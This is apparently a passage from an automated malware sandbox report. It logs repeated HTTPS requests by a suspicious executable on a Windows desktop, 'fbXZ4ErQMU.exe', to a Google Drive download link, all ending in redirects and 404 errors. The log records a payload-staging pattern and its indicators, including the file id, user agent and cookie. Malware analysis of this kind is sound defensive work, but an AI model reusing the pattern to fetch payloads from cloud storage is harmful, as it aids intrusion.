                                                        Content-Security-Policy: script-src 'nonce-pDVxYskwXpJg6ePKjPSI7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.11.2049788142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:23 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:23 UTC1847INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:23 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-EUGawtJepS0rmDvgeaVD2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5p3TfNqwhLQDGbtA9TdF8symRv-IxCZ_boh5nDwpUbP7zmyM6AdUoYnhwb75WzVYl6Q84
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 64 37 75 4f 2d 57 6d 51 5a 42 33 6f 6b 7a 4d 47 68 75 6c 78 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8d7uO-WmQZB3okzMGhulxg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.11.2049789142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:33 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:34 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:34 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-bAz5xG0g6tgiliw55bLdMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.11.2049790142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:34 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:34 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:34 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-kRnWbVoZtDj_hH9UADMkqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5tl8ZQ-ipRAcWHtwDeHNhqTXV9OGaIma6ipvk_pbjlNoVraoZKjAQ_YAJcMuZF7fgy0nlJx2ZmJg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:34 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 62 61 2d 4b 52 53 4e 49 38 42 5f 73 39 64 63 34 55 34 33 56 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Fba-KRSNI8B_s9dc4U43Vg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.11.2049791142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:45 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:45 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:45 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-MUWtL1jWKrzIdUSj9Of8tg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.11.2049792142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:45 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:45 UTC1847INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:45 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-9iNSa6nnqSbIJLwkbGCOjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7gqIBTFdEzzed3t-As8R23MnUqxAe8k55HwSVR_dzHwjUKVmPtbLIybjWQUBMpVhLX1ZE
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 45 4f 36 73 73 6b 35 76 32 72 65 7a 30 4e 49 6f 46 57 61 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iEO6ssk5v2rez0NIoFWaug">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.11.2049793142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:56 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:56 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:56 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-y6pLxwrmJ3hvtyfnJ8zUdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.11.2049794142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:56 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:57 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:57 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-mpdCxqFwI6wT9LjjYOtFLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC68Z4rZQZ20kE5TPpoDQc7C4kBJqHtzGsbVDtl2F2dmCkRhPoWvXsRw1-kOAGGRxybYGyfIn1BZig
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:57 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 59 50 6f 47 66 39 6c 4c 47 6a 59 4d 48 51 32 50 42 57 36 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-YPoGf9lLGjYMHQ2PBW6GA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.11.2049795142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
